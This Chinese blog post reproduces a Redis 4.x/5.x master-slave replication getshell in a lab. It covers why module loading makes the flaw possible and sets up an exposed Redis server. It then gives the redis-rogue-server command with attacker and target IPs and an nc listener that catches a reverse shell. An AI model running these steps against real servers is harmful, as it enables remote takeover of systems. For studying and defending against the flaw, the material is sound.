Redis 漏洞总结 (未完待续)

Redis主从复制getshell

文章参考:https://www.cnblogs.com/iamver/p/11171922.html

环境:Ubuntu 16

​ Kali 2018

影响版本

redis 4.x 5.x

Redis主从复制

参考文章:https://www.freebuf.com/vuls/224235.html,https://paper.seebug.org/975/

redis是一个典型的Key-Value对应的数据库,redis中数据处理都是在内存中进行操作的,然后定期将数据存储到磁盘上,那么如果数据量过于庞大,就会对服务端造成比较大的负担。所以redis采用了主从模式来缓解。主从模式就是让一个redis作为主机,另外的redis作为从机(可以理解为备份机),然后主机和从机中的数据是完全一样的。然后主机负责写,从机负责读。通过读写分离还缓解服务端上的流量压力

漏洞成因

在redis 4.x 之后新增了模块功能,可以允许我们引入外部拓展文件来实现新的redis命令,所以这个漏洞引入了恶意的外部拓展文件而导致的

安装Redis

下载redis的安装包

wget http://download.redis.io/releases/redis-5.0.0.tar.gz

解压

tar -zxvf redis-5.0.0.tar.gz

进入文件夹执行make

make之后截图如下:

修改配置文件 redis.conf

bind 0.0.0.0 (改成0.0.0.0才使得别的主机可以连接,否则只能本地登陆redis服务)

Protected-mode no (如果开启则会禁止公网访问redis)

然后进入src文件夹

执行 ./redis-server ../redis.conf 然后我们的服务就启动了

漏洞复现

下载我们的payload:https://github.com/n0b0dyCN/redis-rogue-server

利用这个payload进行反弹shell

然后执行命令 python3 redis-rogue-server.py --rhost= ubuntu的ip --lhost= kali 攻击机的ip --exp=exp.so

(在复现过程中第一次会报错,但是再次执行payload就好了)

当出来这个问句的时候 kali另起一个终端 nc -lvvp 4444 进行一个监听

成功反弹shell 并且执行了命令

我来评几句
登录后评论

已发表评论数()

相关站点

+订阅
热门文章